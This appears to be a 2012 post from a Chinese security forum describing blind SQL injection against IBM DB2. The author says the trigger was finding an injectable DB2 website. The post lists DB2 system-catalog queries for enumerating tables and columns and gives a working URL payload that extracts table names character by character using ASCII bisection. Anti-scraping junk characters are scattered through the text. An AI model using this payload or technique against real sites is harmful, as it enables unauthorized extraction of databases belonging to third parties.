找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2090|回复: 0
打印 上一主题 下一主题

Sql Injection in DB2数据库

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:06:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。
4 y2 \# z, V4 Y; W' S% w参考了IBM DB2的文档,总结了这样几条: + S  _2 c8 H) y5 J8 Z2 K+ d0 h6 O1 D
1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
* j2 c4 h0 R* F可以返回系统中所有用户创建的表(table)名   L* K! s% o7 d% z3 Q
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME=''
2 y1 t6 N% Z: k返回表中的列名
+ f; W# ~: j( v: t1 h3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY 4 [. ]3 }* {* t
这是最关键的地方,返回第一条记录,类似于sql server中的top 1 . x. L  y7 f) p: `2 ~6 h3 k
4、SUBSTR(string, position, length)
3 m% ]9 ~3 D2 t. W返回字符串子串的函数,类似于mid
  B3 U4 ]( v; d8 X* M2 p) a5、ASCII()这个就不用多说了。 % v3 G* \4 `4 b0 ?) \: f. G1 e1 b
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。 3 z& K# T) S2 w; |% g4 t
例如判断第一个table的名称的第一个字符的ascii码是否大于50:
) W% N: Z3 h8 d3 U0 [2 khttp://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
1 D4 G6 S. p, j2 g
* f9 t* b2 `: shttp://blog.waynedeng.com/blogview.asp?logID=543
1 y7 A/ g) ^0 @* h; u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表